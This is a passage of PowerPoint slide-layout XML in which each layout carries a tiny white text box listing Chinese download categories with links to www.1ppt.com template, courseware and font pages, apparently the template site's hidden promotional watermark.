              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout145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45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45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45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4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46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46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46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46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46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46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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout146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46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46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46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4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47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47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47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47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47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47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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout147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47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47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47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4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48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48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48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48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48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48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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
